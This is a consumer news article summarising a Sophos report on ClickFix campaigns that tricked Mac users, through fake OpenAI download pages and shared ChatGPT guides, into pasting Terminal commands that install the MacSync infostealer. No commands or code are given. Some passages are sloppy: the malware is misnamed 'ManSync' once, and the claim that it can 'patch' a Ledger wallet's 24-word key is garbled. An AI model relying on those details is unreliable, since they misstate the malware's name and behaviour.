I used to be of the opinion that MacBooks are relatively safer than other laptops, but I have been proven wrong. Embarrassingly and demonstrably wrong. A new report from Sophos X-Ops has spared no effort in rubbing my nose in it.
Researchers at the firm tracked three separate attack campaigns between November 2025 and February 2026, all of which targeted macOS users with something called the MacSync infostealer. For those catching up — it’s a type of malware that quietly rifles through your passwords and saved credentials, acting like a digital pickpocket.
So, how does it actually work?
The malware used a delivery method called ClickFix, which requires minimal technical effort. It just needs the victims to copy and paste a command into their Mac’s Terminal (designed to run and execute text-based commands) and press enter on the keyboard.
First, bad actors used fake OpenAI download pages, which were circulated via sponsored ads on Google (sitting right above the legitimate link). Then, they got even more creative: attackers started sharing rear ChatGPT shared conversations disguised as “helpful Mac guides.”
These guides routed users into fake GitHub pages, which contained carefully created software installation instructions, but in reality, they asked users to copy a terminal command, allowing the ManSync infostealer to work in the background. That’s it; that’s the whole attack.
How bad did it get?
Sophos has found out that by December 2025 alone, bad actors had routed more than 50,000 clicks on such malicious domains. A “click” means that someone copied the malicious terminal command, but not necessarily that the malware successfully installed; the actual infection count could be lower.
The developers put another spin on their attacking method in February 2026, allowing it to run silently in the background, bypassing the competent macOS security tools such as Gatekeeper and XProtect. It can, in a very real way, patch your ledger crypto wallet’s 24-word master key.
The firm reports that infection clusters were active in key markets, including parts of North and South America and India, as recently as weeks before they published the article (by the end of the beginning of March, possibly).
Moreover, the notion that “Macs are safe,” is at least, for the time being, not true. As AI platforms grow in popularity, and, more importantly, gain the trust of millions of users, bad actors are coming up with new ways to use the LLMs-driven tools to their advantage. For now, I’d advise you to not paste any text-based command into your Mac’s Terminal.
